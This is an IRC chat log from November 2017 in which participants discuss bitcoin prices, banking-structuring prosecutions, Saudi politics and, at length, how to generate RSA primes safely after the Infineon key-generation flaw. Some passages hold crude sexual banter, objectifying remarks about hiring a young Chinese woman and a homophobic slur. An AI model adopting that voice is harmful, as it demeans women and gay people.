1733169;1509937489;mircea_popescu;yeah. 1733170;1509937499;mircea_popescu;that is a salient point. 1733171;1509937520;BingoBoingo;Most on the market are failed gringo lifestyle projects 1733172;1509937575;mircea_popescu;get the specific item, corp reg for sale by lawyer with no activity. 1733173;1509937649;*;BingoBoingo still has lawyer to offer. Lawyer response rate has been dismal. 1733174;1509937720;mircea_popescu;in other fittings, http://78.media.tumblr.com/262c393815c82efa09bd08f100115736/tumblr_nizwrnX0tH1rdgf8do1_500.gif 1733175;1509937753;BingoBoingo;However plenty of "business hosts" servicing people who want long term re-entry visa to Brazil 1733176;1509937790;mircea_popescu;the economy is so fucking dead... 1733177;1509937887;BingoBoingo;Well yeah. Buncha people with paper frantically trying to keep the pretense of the paper's promises going. Who needs Vandals and Goths when you have baby boomers. 1733178;1509937948;deedbot;http://trilema.com/2017/paolo-il-caldo/ << Trilema - Paolo il caldo 1733179;1509938098;BingoBoingo;Brazil also has lingering liability in uncertain import duties for servers and networking equipment. Being the biggest, supposedly most togetherest on their continent has apparently fucked their heads. 1733180;1509938196;BingoBoingo;Yes, Brazilian DC very hungry for business. The why of their hunger is a portion of the reason I have been getting practice patching drywall these past two weeks. 1733181;1509939051;BingoBoingo;!~ticker --market all 1733182;1509939058;jhvh1;BingoBoingo: Bitstamp BTCUSD last: 7239.79, vol: 9684.51943163 | Bitfinex BTCUSD last: 7223.1, vol: 49426.52077825 | Kraken BTCUSD last: 7226.3, vol: 2925.8141158 | Volume-weighted last average: 7225.85638145 1733183;1509939915;deedbot;http://deedbot.org/bundle-493262.txt 1733184;1509940888;BingoBoingo;!~bcstats 1733185;1509940889;jhvh1;BingoBoingo: Current Blocks: 493279 | Current Difficulty: 1.452839779145E12 | Next Difficulty At Block: 493919 | Next Difficulty In: 640 blocks | Next Difficulty In About: 4 days, 11 hours, 4 minutes, and 39 seconds | Next Difficulty Estimate: None | Estimated Percent Change: None 1733186;1509945313;deedbot;http://www.contravex.com/2017/11/05/iqaluit-nunavut-an-isolated-colonial-outpost-of-a-somewhat-less-isolated-colonial-outpost-of-the-pockmarked-empire/ << Contravex: A blog by Pete Dushenski - Iqaluit, Nunavut: An isolated colonial outpost of a somewhat less isolated colonial outpost of the pockmarked Empire. 1733187;1509961178;mircea_popescu;BingoBoingo item is markedly better in that it contains factual details ; still not great in that the details there present are disorganised, not evidently sorted into a complete tree with branches clipped by an obvious importance criteria and so on. 1733188;1509961624;mircea_popescu;definitely acceptable for first month anyway, i'd say. 1733189;1509971250;deedbot;http://trilema.com/2017/simple-method-to-moisturize-the-female/ << Trilema - Simple method to moisturize the female 1733190;1509972128;mircea_popescu;!!up RagnarDanneskjol 1733191;1509972129;deedbot;RagnarDanneskjol voiced for 30 minutes. 1733192;1509972205;RagnarDanneskjol;I can still voice no prob. thank 1733193;1509972375;mircea_popescu;cool. 1733194;1509972440;shinohai;gm mircea_popescu 1733195;1509972445;mircea_popescu;hola 1733196;1509972483;shinohai;Espero k tengas un dia muy bestial! =^.^= 1733197;1509972503;RagnarDanneskjol;I am totally with you on "where is it written" Fuckin A, these Cali chicks always trying to prove something in the sac. I'm having the same conversation all the time - 'where is it written that you have to grind my dick off like a jackhammer before you even start to get wet? 1733198;1509972515;mircea_popescu;o.O 1733199;1509972559;mircea_popescu;i can't say i've had the experience. but... sounds like they're trying to overperform to impress ? not a bad trait it itself. 1733200;1509972576;RagnarDanneskjol;Could have worse problems, yes 1733201;1509972748;shinohai;I shall have to purchase a pin meter and hire the services of 10-20 women to test this hypothesis ..... 1733202;1509972760;RagnarDanneskjol;heh 1733203;1509972826;RagnarDanneskjol;MP - I tried to follow the 'girl worker at a desk in Beijing' conversation, but not quite clear on the requirement there - anything I can do to help? I know lots of ppl in BJ and will be there for work next week. 1733204;1509972957;mircea_popescu;well, we're looking to hire a local. 1733205;1509972968;RagnarDanneskjol;got that much 1733206;1509973074;RagnarDanneskjol;he or she needs to be able to take calls in Chinese , English and be able to do what else approximately? 1733207;1509973144;mircea_popescu;spend the usual 200 hours/week connected to irc and doing whatever clerical tasks provided. must be native chinese speaker with a reasonable command of english, she's not expected to take calls or anything in it. 1733208;1509973244;RagnarDanneskjol;ah ok, will send anyone i find that seems competent. Preference is located in BJ or surrounding areas for some reason? 1733209;1509973316;mircea_popescu;not specifically. can reside wherever, but not much interest in country girl chained-to-the-land mentalities. 1733210;1509973326;RagnarDanneskjol;ok 1733211;1509980220;mircea_popescu;asciilifeform BingoBoingo http://p.bvulpes.com/pastes/L2mNM/?raw=true 1733212;1509982039;asciilifeform;!~later tell phf do you know this https://archive.org/details/bitsavers_metheusSch_74035988 d00d ? 1733213;1509982039;jhvh1;asciilifeform: The operation succeeded. 1733214;1509982118;asciilifeform;!~later tell phf http://bitsavers.trailing-edge.com/pdf/metheus/ << moar, apparently. 1733215;1509982118;jhvh1;asciilifeform: The operation succeeded. 1733216;1509982165;asciilifeform;or hm, possibly nm, not directly bolix, some ancient prototype on pdp... 1733217;1509984116;shinohai;Don't insult teh Fuhrer http://archive.is/Oathw 1733218;1509985304;asciilifeform;https://archive.is/ZuzvO << from same rag, 'They accused him of “structuring” — depositing money in increments of less than $10,000' 1733219;1509985395;mircea_popescu;"not breaking the law is a crime!" 1733220;1509985481;asciilifeform;the '10,000' thing also has an element of 'torbrowserism' -- to spread the notion, among the simple, that 'it has to be >10k to be seen' 1733221;1509985562;asciilifeform;and on top is this, there is ~state~ level copy of same apparatus. e.g. in asciilifeform's local moneychangery, there is a placard, hanging in plain sight , re 'to cachiers: you MUST report all tx of 2k or larger, even if customer was regular for decades, by order of maryland something-or-other commission' 1733222;1509986386;ben_vulpes;unrelatedly, read "incremental approach to compiler construction" recently; reads like a "make you a scheme for great good" for von neumann fans 1733223;1509987325;shinohai;http://btcbase.org/log/2017-11-06#1733204 Got you a native packed and ready to go: http://btcinfo.sdf.org/uploads/chinagirl.webm 1733224;1509987325;a111;Logged on 2017-11-06 12:55 mircea_popescu: well, we're looking to hire a local. 1733225;1509987341;mircea_popescu;shinohai mmm 1733226;1509987402;mircea_popescu;teh girls agree - that shit's scary. 1733227;1509987441;asciilifeform;i had nfi there were ( what appears to be ) off-the-shelf man-sized vacuum bag 1733228;1509987460;mircea_popescu;that, evidently. side of beef egc. 1733229;1509987494;asciilifeform;this one clearly built as reusable item -- nipple valve 1733230;1509987598;shinohai;You can buy the pansy-ass modified ones with breathing tubes @ local sex shop. 1733231;1509988396;BingoBoingo; definitely acceptable for first month anyway, i'd say. << The second month will be more organized in the course of going along 1733232;1509988979;asciilifeform;meanwhile, in vintage zoologies, http://www.iarums-r1.org/iarums/sound/main.html 1733233;1509989083;asciilifeform;!!up TomServo 1733234;1509989084;deedbot;TomServo voiced for 30 minutes. 1733235;1509989107;TomServo;Ahoy 1733236;1509989116;asciilifeform;heya 1733237;1509989120;asciilifeform;where've you been , TomServo 1733238;1509989166;TomServo;Sweltering in the desert heat of another Gentoo quest. 1733239;1509989252;asciilifeform;hm> 1733240;1509989253;asciilifeform;? 1733241;1509989396;TomServo;Ah, bit more than I can chew, trying to fashion your crapolade masks into a workable Gentoo laptop. 1733242;1509989433;asciilifeform;any particular headaches ? 1733243;1509989480;TomServo;Being rid of systemd isn't so hard.. but dbus is quite a bitch. 1733244;1509989506;trinque;soon as you want a chromium browser you're gonna get it 1733245;1509989519;ben_vulpes;^ 1733246;1509989521;asciilifeform;iirc somebody had a defang patch for it 1733247;1509989523;asciilifeform;but i never tried 1733248;1509989526;trinque;ah neat 1733249;1509989531;asciilifeform;may be in the logs. 1733250;1509991833;BingoBoingo;!!up TomServo 1733251;1509991834;deedbot;TomServo voiced for 30 minutes. 1733252;1509992508;BingoBoingo;!~ticker --market all 1733253;1509992516;jhvh1;BingoBoingo: Bitstamp BTCUSD last: 7080.0, vol: 16214.32986376 | Bitfinex BTCUSD last: 7085.3, vol: 62756.33259272 | Kraken BTCUSD last: 7128.5, vol: 4443.54729466 | Volume-weighted last average: 7086.57106994 1733254;1509993132;davout;http://btcbase.org/log/2017-11-06#1733218 <<< "The IRS wouldn’t comment on Kwon’s specific case, but a spokesman noted that he pleaded guilty to the structuring charge." 1733255;1509993132;a111;Logged on 2017-11-06 16:21 asciilifeform: https://archive.is/ZuzvO << from same rag, 'They accused him of “structuring” — depositing money in increments of less than $10,000' 1733256;1509993321;ben_vulpes;lookie, usg agents teaching the world that depositing into their banks is a fucking terrible deal 1733257;1509993482;ben_vulpes;a zillionth of a percent in interest if we don't sieze everything on a whim 1733258;1509993520;asciilifeform;interest-bearing konsoomer accts are mostly a nostalgic memory in natoschwitz. 1733259;1509995630;mircea_popescu;"but there are no alternatives111!!!" 1733260;1509995659;asciilifeform;the 'alternative' of simply having no money, is rather popular 1733261;1509995962;asciilifeform;in other lulz, https://archive.is/UVcTG >> 'reports of death of yet another Saudi prince' 1733262;1509995968;mircea_popescu;i'm sure. 1733263;1509996470;deedbot;http://trilema.com/2017/how-the-beastforumcom-private-messaging-function-became-a-paid-user-only-item/ << Trilema - How the beastforum.com private messaging function became a paid-user-only item 1733264;1509996912;shinohai;My curiosity is now satiated. 1733265;1509996952;mircea_popescu;heh 1733266;1509997325;shinohai;I'm just happy to know mircea_popescu isn't building a new kind of stable. 1733267;1509997356;mircea_popescu;stability is key. 1733268;1509998469;hanbot; in other lulz, https://archive.is/UVcTG >> 'reports of death of yet another Saudi prince' << meanwhile i was reading this morning "riadyh ritz-carlton now detention center for saudi royals", (http://archive.is/p7KPc), but tuned out when "evidence" seemed to consist of "booking websites" not having rooms available. 1733269;1509998497;mircea_popescu;heh 1733270;1509998509;asciilifeform;they can have a 1938 if they feel like, wainot 1733271;1509998530;asciilifeform;the moar, the merrier. 1733272;1509998551;mircea_popescu;so what's the rumous mill, the friendly iranians ? 1733273;1509998580;asciilifeform;'The conference was spearheaded by Crown Prince Mohammed bin Salman, who is pushing an ambitious reform plan that is aimed at reducing the country's dependence on oil over the next decade. The prince is also leading the anti-corruption committee that has the authority to investigate, arrest, issue travel bans and freeze the assets of those it finds corrupt.' << lol! 1733274;1509998596;mircea_popescu;oh i see, it's the even friendlier us ? 1733275;1509998624;asciilifeform;afaik 'anticorruption' only ever means 1 thing 1733276;1509998635;mircea_popescu;"we're running out of money, tax the provinces" ? 1733277;1509998642;asciilifeform;aha 1733278;1509998671;mircea_popescu;hey, the saudis have a lot of paper moneyz. 1733279;1509998749;asciilifeform;possibly gotta 1938 the wrong-chirality bluebloods who want to spend it in usg-unapproved ways (e.g. btc) ..? 1733280;1509998792;mircea_popescu;kinda weakly defended, them bluebloods. 1733281;1509998814;mircea_popescu;"richest guy on planet" could not afford tanks and missile launchers enough to dispose of "new anti-corruption unit" ? 1733282;1509998831;mircea_popescu;idjits don't know when to open fire, keep waiting for "a better day". 1733283;1509998853;asciilifeform;as described on trilema and elsewhere, usd ain't money, it's 'money[*]', and the * typically includes 'cannot be spend on defense from usg' 1733284;1509998869;asciilifeform;( see also http://btcbase.org/log/2017-10-08#1722633 ) 1733285;1509998869;a111;Logged on 2017-10-08 14:18 mircea_popescu: " “The Saudi’s will not be able to link the S-400 with Saudi’s current (US and Europe-sourced) infrastructure, nor will they be able to connect the S-400 with US systems." << says who the everloving fuck. 1733286;1509998880;mircea_popescu;heh. 1733287;1509999026;deedbot;http://trilema.com/2017/alexandru-osvald-pastorel-teodoreanu/ << Trilema - Alexandru Osvald "Pastorel" Teodoreanu 1733288;1509999112;mircea_popescu;shinohai part 2 of the lulz is that the userbase is now revolting. "Well screw that then. This website is a big hoax." 1733289;1509999128;mircea_popescu;turns out it's not the brightest idea to deny people access to the body of a message if you're gonna send that subject line via email. 1733290;1509999293;*;shinohai rushes to set up "betterbeastforum.com" and offer unlimited messaging and access for 5 bux a month ..... 1733291;1509999302;mircea_popescu;for srsly. 1733292;1509999567;asciilifeform;elsewhere, http://trilema.com/2017/tmsr-rsa-spec-extremely-early-draft/#comment-123446 1733293;1509999661;mircea_popescu;answer't. 1733294;1509999820;asciilifeform;answ'x2. 1733295;1510000079;BingoBoingo;mircea_popescu asciilifeform http://wotpaste.cascadianhacker.com/pastes/tUp2H/?raw=true 1733296;1510000095;mircea_popescu;!~later tell apeloyee http://trilema.com/2017/tmsr-rsa-spec-extremely-early-draft/#comment-123449 let's get teh guy involved as well. 1733297;1510000095;jhvh1;mircea_popescu: The operation succeeded. 1733298;1510000120;asciilifeform;BingoBoingo: got it 1733299;1510000124;BingoBoingo;ty 1733300;1510002486;diana_coman;hmm, I suppose I could run a trial test on a batch of generated public exponents with co-prime rather than strict prime requirements, to see what small factors are there but not sure if this will say a lot really in itself; fwiw I don't feel particularly comfortable with the idea of a non-prime public exponent but I don't have mathematical proof for weakness introduced, hence my question 1733301;1510002576;asciilifeform;diana_coman: see thread 1733302;1510002582;asciilifeform;( at trilema, that is ) 1733303;1510002622;*;diana_coman refreshes 1733304;1510004544;asciilifeform;in other lulz, comcast ( mega-monopoly isp in good chunk of usa ) is down. 1733305;1510004546;asciilifeform;all of it. 1733306;1510004701;ben_vulpes;was shitty for a bit there 1733307;1510004716;ben_vulpes;bgp say my bofhs 1733308;1510012950;shinohai;https://coinmarketcap.com/currencies/segwit2x/ <<< kek 1733309;1510014443;mircea_popescu;shinohai that dun look too good. 1733310;1510014462;mircea_popescu;when's teh stuff supposed to come online again ? 1733311;1510014603;davout;~nov. 16 iirc 1733312;1510014688;shinohai;Yup 1733313;1510014700;mircea_popescu;ah right. 1733314;1510014711;mircea_popescu;well, 10 day futures at 10% is terrible in and of itself. 1733315;1510014732;mircea_popescu;iirc the confederate republic scored this low after lee surrended and not at any point before 1733316;1510023722;deedbot;http://trilema.com/2017/vedo-nudo/ << Trilema - Vedo nudo 1733317;1510051651;davout;trade volume seems pretty low on all these ~100 btc/24h 1733318;1510051747;davout;buttfinex also has such a market with roughly the same volume figures 1733319;1510054881;davout;meanwhile: https://paritytech.io/blog/security-alert.html 1733320;1510054889;davout;"This means that currently no funds can be moved out of the multi-sig wallets." 1733321;1510058010;shinohai;BWAHAHAHAHA davout 1733322;1510058512;davout;who knows, maybe that leads to an "Ethereum Classic 2" 1733323;1510058661;davout;or maybe they'll grow used to having Ctrl+Z as a thing 1733324;1510058707;shinohai;Shit has more rollbacks than Walmart as it is. 1733325;1510061148;mircea_popescu;multi sig was such a brilliant itdea. 1733326;1510061288;shinohai;Thanx Gavin! 1733327;1510064902;davout;according to unverified hearsay it seems that ~1% of the total mEth supply got accidentally'd 1733328;1510064913;mircea_popescu;just a flesh wound. 1733329;1510064941;mircea_popescu;it's important to be creative in any case. they can produce more eth at any time, but the experience was valuable. 1733330;1510064945;mircea_popescu;AND OTHER SUCH NONSENSE 1733331;1510065028;shinohai;"How to fail and make people liek it - By Vitalik Butterin" 1733332;1510065133;shinohai;You may remember Vitalik from other great books such as "How to run a quantum computing scam to raise capital for a crypto scam" and "Dress like a furfag and cook your own meth!" 1733333;1510065202;mircea_popescu;heh. i think quantum computing was abandoned because it was discovered it leaked CFC gasses which are bad for the ozone layer 1733334;1510065209;mircea_popescu;wait, wrong decade. it's not the 1990s anymore! 1733335;1510065235;shinohai;Ozone hole is shrinking! 1733336;1510065241;asciilifeform;in other lullies, bernstein exposes the item the original 'authors' sat on in http://btcbase.org/log/2017-10-17#1725945 >>> https://blog.cr.yp.to/20171105-infineon.html 1733337;1510065241;a111;Logged on 2017-10-17 05:59 jurov: "The flaw resides in the Infineon-developed RSA Library version v1.02.013, specifically within an algorithm it implements for RSA primes generation. " 1733338;1510065268;asciilifeform;spoiler : infineon used http://btcbase.org/log/2017-10-07#1722402 method. 1733339;1510065268;a111;Logged on 2017-10-07 21:48 apeloyee: http://btcbase.org/log/2017-10-05#1721485 << alternatively, can *construct* numbers which don't have very small factors. pick a nonzero remainder mod 2, mod 3, ... mod largest-prime-fit-in-your-primorial and find what number of primorial is congruent to it using chinese remainder theorem 1733340;1510065351;asciilifeform;'This could even be a deliberate weakness with plausible deniability: "Oh, sorry, nobody warned us that 2 mod 11 was okay and 10 mod 11 wasn't."' 1733341;1510065546;mircea_popescu;heh 1733342;1510068502;asciilifeform;i did say : http://btcbase.org/log/2017-10-08#1722426 1733343;1510068502;a111;Logged on 2017-10-08 00:16 asciilifeform: http://btcbase.org/log/2017-10-07#1722402 << this is a fundamentally wrong way to generate cryptographic primes. we had a thread about it, http://btcbase.org/log/2017-08-14#1697562 1733344;1510068540;asciilifeform;any method of 'constructing' primes , rather than hunting for wild, is guilty until proven innocent of 1) constriction 2) bias 1733345;1510068674;asciilifeform;'Further computations were consistent with the guess that p and q were being generated as powers of 65537 modulo L, where L was either the product of all primes through 691, or the product of all primes through 701.' 1733346;1510068711;asciilifeform;https://blog.cr.yp.to/20171105-infineon3.txt << b's commented coad. 1733347;1510071007;mircea_popescu;asciilifeform http://trilema.com/2017/tmsr-rsa-spec-extremely-early-draft/#comment-123474 so there. 1733348;1510071432;*;asciilifeform looks.. 1733349;1510071450;*;asciilifeform unsurprised, lol 1733350;1510071457;asciilifeform;modular arithmetic . 1733351;1510071508;asciilifeform;but mircea_popescu's original point was correct, you do NOT want a small d -- but neither you want a small e, or obviously n, or ANYTHING small 1733352;1510071524;asciilifeform;no reason to. not on ffa, at any rate. 1733353;1510071569;asciilifeform;for 4096b rsa, use 4096b randomprime e; 2048b randomprime p, q. 1733354;1510071572;asciilifeform;ohai apeloyee 1733355;1510071630;apeloyee;hello 1733356;1510071695;apeloyee;I must say that I dont understand how "exponent 131074 reduces to exponent 2 somehow", and what CRT has to do with it 1733357;1510071703;apeloyee;(re ^^) 1733358;1510071716;apeloyee;http://trilema.com/2017/tmsr-rsa-spec-extremely-early-draft/#comment-123453 1733359;1510071767;apeloyee;http://btcbase.org/log/2017-11-07#1733338 << per bernstein, they didn't. 1733360;1510071767;a111;Logged on 2017-11-07 14:34 asciilifeform: spoiler : infineon used http://btcbase.org/log/2017-10-07#1722402 method. 1733361;1510071767;asciilifeform;apeloyee: q was re the effect of composite exponent 1733362;1510071778;apeloyee;I understood that much 1733363;1510071787;apeloyee;but how 1733364;1510071807;asciilifeform;apeloyee: did you read same bernstein as was linked ? pretty clearly pins 'constructed primes' 1733365;1510071824;apeloyee;NO U 1733366;1510071829;apeloyee;seriously. 1733367;1510071849;asciilifeform;what am i missing 1733368;1510071902;apeloyee;they calculated powers of 65537 modulo some primorial 1733369;1510071961;asciilifeform;how is this not 'constructed prime' ? 1733370;1510072005;apeloyee;it's not the same method as http://btcbase.org/log/2017-11-07#1733339 1733371;1510072005;a111;Logged on 2017-11-07 14:34 a111: Logged on 2017-10-07 21:48 apeloyee: http://btcbase.org/log/2017-10-05#1721485 << alternatively, can *construct* numbers which don't have very small factors. pick a nonzero remainder mod 2, mod 3, ... mod largest-prime-fit-in-your-primorial and find what number of primorial is congruent to it using chinese remainder theorem 1733372;1510072066;asciilifeform;it is not the same exact algo, no. but it is same from my pov, in that it is NOT the 'find b-bit random R and test for primality, potentially forever, until found prime' 1733373;1510072110;apeloyee;the http://btcbase.org/log/2017-11-07#1733339 method, given uniformly distributed and independent remainders, generates uniformly distributed numbers modulo the primorial 1733374;1510072110;a111;Logged on 2017-11-07 14:34 a111: Logged on 2017-10-07 21:48 apeloyee: http://btcbase.org/log/2017-10-05#1721485 << alternatively, can *construct* numbers which don't have very small factors. pick a nonzero remainder mod 2, mod 3, ... mod largest-prime-fit-in-your-primorial and find what number of primorial is congruent to it using chinese remainder theorem 1733375;1510072152;asciilifeform;1 problem is that perfect uniform distrib and perfectly independent rng bits, cannot be shown to exist physically. 1733376;1510072187;asciilifeform;the use of constructed primes, potentially amplifies small/temporary imperfections in the rng, into fatal 1733377;1510072228;asciilifeform;the other problem is that prime constructor proof may or may not fit-in-head. infineon's method probably seemed correct to various folx. 1733378;1510072300;apeloyee;perharps running rabin-miller "amplifies small/temporary imperfections in the rng, into fatal" 1733379;1510072308;apeloyee;at that point might as well give up 1733380;1510072314;asciilifeform;apeloyee: propose a hypothetical how ? 1733381;1510072503;apeloyee;can't. I was sarcastic, because I don't see how CRT construction can amplify, assuming not obviously broken/backdoored RNG. why won't long-range correlations kill mthe "pick random prime" method as well? 1733382;1510072593;asciilifeform;let's model the ideal prime-shitter. it would be an item that takes integer N , of whatever bitness, and produce the Nth prime ( or eggog if the Nth prime is bigger than the register bitness permitted. ) 1733383;1510072611;apeloyee;ok 1733384;1510072614;asciilifeform;i.e. a 1:1 pipe from random ints to large primes. 1733385;1510072634;asciilifeform;to have a satisfactory constructor, it would have to be shown to reduce to this and exactly this. 1733386;1510072693;apeloyee;"pick random" is obviously not this 1733387;1510072695;asciilifeform;in particular, gotta show that no two inputs will produce the same prime 1733388;1510072703;asciilifeform;pick-random satisfies above. 1733389;1510072754;apeloyee;you don't believe in CRT? 1733390;1510072770;asciilifeform;also gotta show that no prime exists , in the given bitness width, that CANNOT be chosen. 1733391;1510072786;asciilifeform;what means believe-in-crt ? 1733392;1510072799;asciilifeform;i believe in the arithmetic, yes. but how to show that the two conditions i stated, hold ? 1733393;1510072822;asciilifeform;if apeloyee knows a proof for this, i'll read 1733394;1510072915;asciilifeform;but as i currently understand, my q reduces to 'find The Formula For Primes' (tm)(r), a millenium-long headache for mathematical folx , to this day unsolved. 1733395;1510073082;apeloyee;plox to qualify. you want a method to generate Nth prime, but accept the "pick random number until prime" , despite in not being the Nth prime generator, but no other methods? 1733396;1510073140;asciilifeform;i want a method, as stated above, where inputs map one-to-one and onto, the primes , up to the register width. 1733397;1510073172;asciilifeform;the random-rubbish followed by probabilistic test , satisfies this demand within the obvious limits of the test. 1733398;1510073213;asciilifeform;i can show that no 2 inputs will produce the same prime, trivially 1733399;1510073236;asciilifeform;and since i built the rng, i can also be quite certain that there is not such a prime that it will forever avoid generating. 1733400;1510073237;apeloyee;aha, so you're ok with the method produces junk, so long as the primes in range are equidistributed? 1733401;1510073247;asciilifeform;how is it 'junk' ? 1733402;1510073266;asciilifeform;equidistributed primes are what was asked for. 1733403;1510073316;apeloyee;"pick random" will usually yield a composite, which must then be filtered out. 1733404;1510073325;asciilifeform;this costs time, yes. 1733405;1510073354;asciilifeform;folx who are in a hurry, can parallelize. 1733406;1510073361;asciilifeform;( it parallelizes infinitely ) 1733407;1510073397;apeloyee;how many bits/s does your generator yield? 1733408;1510073410;asciilifeform;7-8 kB/sec, depending on room temperature. 1733409;1510073413;asciilifeform;per unit. 1733410;1510073423;asciilifeform;( many folx have half a dozen, or more ) 1733411;1510073440;apeloyee;kilobyte? 1733412;1510073443;asciilifeform;aha 1733413;1510073539;asciilifeform;theoretically one can connect an unlimited # of'em to pc (in practice linux kernel starts behaving oddly when more than 7 serial devices, i found ) 1733414;1510073580;asciilifeform;i am probably doomed to make a pci version, because of this, at some point. but so far not urgent itch. 1733415;1510074061;asciilifeform;incidentally it can probably be shown that you don't have to throw out ALL of the bits in a candidate R, when it is not found to be prime, and still not leak anything 1733416;1510074069;asciilifeform;but i have not yet tried this. 1733417;1510074106;asciilifeform;( the koch method, of taking R and adding 2 to it until m-r says yes, trivially leaks ) 1733418;1510074200;asciilifeform;what ought to do instead, is to rngize the bottom Q bits, where Q is log2(estimated prime gap at the current bitness, times severalfold engineering margin) 1733419;1510074209;asciilifeform;until passes. 1733420;1510074329;asciilifeform;( exercise for n00bz : show that there is ALWAYS a prime between n and 2n, for n > 1. ) 1733421;1510074589;asciilifeform;( exercise #2 : show how many bits of input entropy are on avg. discarded by koch generator. ) 1733422;1510074835;asciilifeform;unrelatedly, scihub seems to finally have broken, i get 11 'captchas' in a row, gave up 1733423;1510074861;asciilifeform;( why is there EVER EVEN ONE ?! ) 1733424;1510074969;asciilifeform;imho this is an idiocy that perma-discredits everyone even tangentially involved. 1733425;1510075019;asciilifeform;http://btcbase.org/log/2017-08-30#1706321 << see also. 1733426;1510075019;a111;Logged on 2017-08-30 15:53 asciilifeform: 13:08 < kanzure> she wants to control the access in her own way 1733427;1510075639;apeloyee;so to recap, http://btcbase.org/log/2017-10-07#1722402 generates numbers in range [0, primorial-1]; it may yield a composite, but all outputs are equally likely, and all primes bigger than largest_prime_in_primorial and less than the primorial. Proof: since asciilifeform has admitted to believing in the statement of the Chinese Remainder Theorem (http://btcbase.org/log/2017-11-07#1733392 ),... 1733428;1510075639;a111;Logged on 2017-10-07 21:48 apeloyee: http://btcbase.org/log/2017-10-05#1721485 << alternatively, can *construct* numbers which don't have very small factors. pick a nonzero remainder mod 2, mod 3, ... mod largest-prime-fit-in-your-primorial and find what number of primorial is congruent to it using chinese remainder theorem 1733429;1510075639;a111;Logged on 2017-11-07 16:39 asciilifeform: i believe in the arithmetic, yes. but how to show that the two conditions i stated, hold ? 1733430;1510075640;apeloyee;...then, by the CRT, there exists a bijection between all numbers in range [0, primorial-1] not divisible by any primes in the primorial, and the tuples of nonzero remainders from division by the primes. "numbers in range [0, primorial-1] not divisible by any primes in the primorial", obviously, includes all primes in said range (except those in the primorial). if the remainders mod 2, 3,... 1733431;1510075642;apeloyee;......p_n are independent and uniformly distributed, then the probability of tuple of these being chosen is the same (by definition of independence), and because CRT gives a bijection, all outputs are equally likely. did I repeat myself enough? 1733432;1510075695;apeloyee;re http://btcbase.org/log/2017-11-07#1733424 1733433;1510075695;a111;Logged on 2017-11-07 17:16 asciilifeform: imho this is an idiocy that perma-discredits everyone even tangentially involved. 1733434;1510075709;asciilifeform;apeloyee: can i persuade you to pseudocodize ? 1733435;1510075721;asciilifeform;would make eating, much easier. 1733436;1510075725;apeloyee;!#s "errything for phree" 1733437;1510075725;a111;0 results for "\"errything for phree\"", http://btcbase.org/log-search?q=%22errything%20for%20phree%22 1733438;1510075747;apeloyee;you want sci-hub to wwork for phree? 1733439;1510075755;asciilifeform;how does it make bank from the captcha ? 1733440;1510075772;asciilifeform;( lemme guess, spammers pay to farm theirs ? ) 1733441;1510075854;apeloyee;how does it make bank from the captcha ? << it's just a proof of work. it's not unknown for sci-hub to ban etire countries also. 1733442;1510075868;apeloyee;!#s "errythingforphree" 1733443;1510075868;a111;1 result for "\"errythingforphree\"", http://btcbase.org/log-search?q=%22errythingforphree%22 1733444;1510075870;asciilifeform;re crt, if apeloyee thinks he has found The Formula For Primes, he should not settle for small change, oughta publish... 1733445;1510075879;apeloyee;I don't. 1733446;1510075895;asciilifeform;maybe i'm thick : what's the difference ? 1733447;1510075923;apeloyee;It's a method to generate a muber not divisible by small primes. Might be still divisible by large ones. 1733448;1510075927;apeloyee;*number 1733449;1510075928;asciilifeform;ahahahahahaha 1733450;1510075934;asciilifeform;so what's the use of this then ? 1733451;1510075952;asciilifeform;to set myself up to be nailed infineon-style ?! 1733452;1510075956;asciilifeform;nothx 1733453;1510075979;apeloyee;I still haven't heard how it will get you nailed. 1733454;1510075991;asciilifeform;> Might be still divisible by large ones. 1733455;1510076005;apeloyee;do miller-rabin on the results. 1733456;1510076081;asciilifeform;it's a fat pile of complexity, for a measely, what, 90% optimization. 1733457;1510076090;asciilifeform;i for one dun particularly care if keygenning takes a few hours. 1733458;1510076124;apeloyee;quit flipping from one opinion to another every few days 1733459;1510076138;asciilifeform;link to log or stfu 1733460;1510076296;apeloyee;http://btcbase.org/log/2017-10-05#1721484 1733461;1510076296;a111;Logged on 2017-10-05 19:38 asciilifeform: for the initial sieve ~prior~ to miller-rabin 1733462;1510076315;apeloyee;http://btcbase.org/log/2017-10-05#1721491 1733463;1510076315;a111;Logged on 2017-10-05 19:40 asciilifeform: trial division is dog slow vs gcd. 1733464;1510076350;asciilifeform;i have nothing against ~simple and OBVIOUSLY correct~ optimizations, apeloyee 1733465;1510076396;asciilifeform;and i am willing to make an effort and stretch muscles to expand my definition of 'obviously correct', but to a point. 1733466;1510076640;apeloyee;in fact, using evil, heretical software, calculated that this tries ~6.5 times less candidates for ~2048-bit primes compared to the pick-random-odd-number 1733467;1510076659;asciilifeform;i can believe 1733468;1510076782;apeloyee;well, is CRT nonwell, of cource I can't clain that CRT is obvious. But I think you're just allergic to it 1733469;1510076794;apeloyee;*claim 1733470;1510078905;asciilifeform;not the crt per se, but that apeloyee's algo doesn't leak-via-timing, or bias, or avoid some class of prime, is not (yet) obvious to asciilifeform . 1733471;1510078910;asciilifeform;i'ma chew on it tho. 1733472;1510078945;asciilifeform;and yes i am in fact allergic to any algo that i do not immediately understand, because entire objective of ffa is to be correct-via-obviousness. 1733473;1510078965;asciilifeform;while at the same time usably fast. which is the engineering tension there. 1733474;1510078997;apeloyee;http://btcbase.org/log/2017-11-04#1733014 << this immediately smells like a magical voodoo invisibility potion 1733475;1510078997;a111;Logged on 2017-11-04 18:37 asciilifeform: for same reason you an' i, have 2 eyes 1733476;1510079027;asciilifeform;apeloyee: how do you modulate-by-position if you don't have more than 1 position ? 1733477;1510079046;asciilifeform;conjecture was, that you can transmit below noise floor, and still receive by demodulating strictly positionally. 1733478;1510079060;asciilifeform;( i have presently nfi if it is true ) 1733479;1510079605;apeloyee;but you claimed "just 2", and not 3, 4... 1733480;1510079658;asciilifeform;it will work with >2, but afaik you only need 2. 1733481;1510080023;apeloyee;i could understand if having 2,3, 4,... transmitters progressively lowering the detection chance 1733482;1510080051;apeloyee;but "1 transmitter is visible, 2 are not" i find hard to believe 1733483;1510080091;asciilifeform;1 , transmitting below noise floor, is equally invisible, but also gives no way to receive... 1733484;1510080162;asciilifeform;2 is the bare minimum for a working ( again conjectured, whether it could work ) item. 1733485;1510080172;asciilifeform;naturally 22 is better. and 222 moar so. 1733486;1510080291;asciilifeform;1 type of 'positionally modulated' radio, that is already very old tech, is satellite nav. 1733487;1510080330;apeloyee;didn't you describe a scheme for 1 transmitter? in each time interval, pick many cryptographically pseudo-random orthogonal waveforms, calculate a weighted sum, transmit. the weights encode information. can split into many transmitters in various places. 